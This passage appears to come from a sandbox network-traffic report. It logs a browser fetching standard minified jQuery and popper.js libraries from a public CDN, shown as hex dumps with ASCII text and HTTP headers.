                                                                                                                                          Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                                                                                                          Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                                                                          Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                                                                                          Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                                                                                                          Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                                                                                          Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                                                                                          Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 5f 2c 61 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29
                                                                                                                                          Data Ascii: getElementsByName||!n.getElementsByName(u).length}),c.getById?(d.filter.ID=function(a){var b=a.replace(_,aa);return function(a){return a.getAttribute("id")===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a)
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                                                                                                                                          Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                                                                                                                                          2024-11-28 10:32:15 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                                                                                                          Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.449750104.17.24.144432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:32:15 UTC607OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://igacorp.conohawing.com
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://igacorp.conohawing.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:32:15 UTC959INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:32:15 GMT
                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                                          ETag: W/"5eb03fa9-4af4"
                                                                                                                                          Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                          Age: 1771643
                                                                                                                                          Expires: Tue, 18 Nov 2025 10:32:15 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OtAP8sYpF6JAnmUEhS3Db8Zr9fM8BwNlgEb3bSSWAXI6vF%2F9FWA14DWIrRpv5PYssUDABj6kdf6hPN%2BJY38nhJDJIUbEoCiVbt93WuztDr%2Br9BgTChZfuDdN1fUeW8ZVwMREhD7e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e99b1690ceb43a7-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-28 10:32:15 UTC410INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                                          Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27
                                                                                                                                          Data Ascii: e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document'
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65
                                                                                                                                          Data Ascii: var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['borde
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e
                                                                                                                                          Data Ascii: :p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64
                                                                                                                                          Data Ascii: ht:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.wid
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e
                                                                                                                                          Data Ascii: .warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instan
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69
                                                                                                                                          Data Ascii: s.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passi
                                                                                                                                          2024-11-28 10:32:15 UTC1369INData Raw: 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75
                                                                                                                                          Data Ascii: rn o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){retu
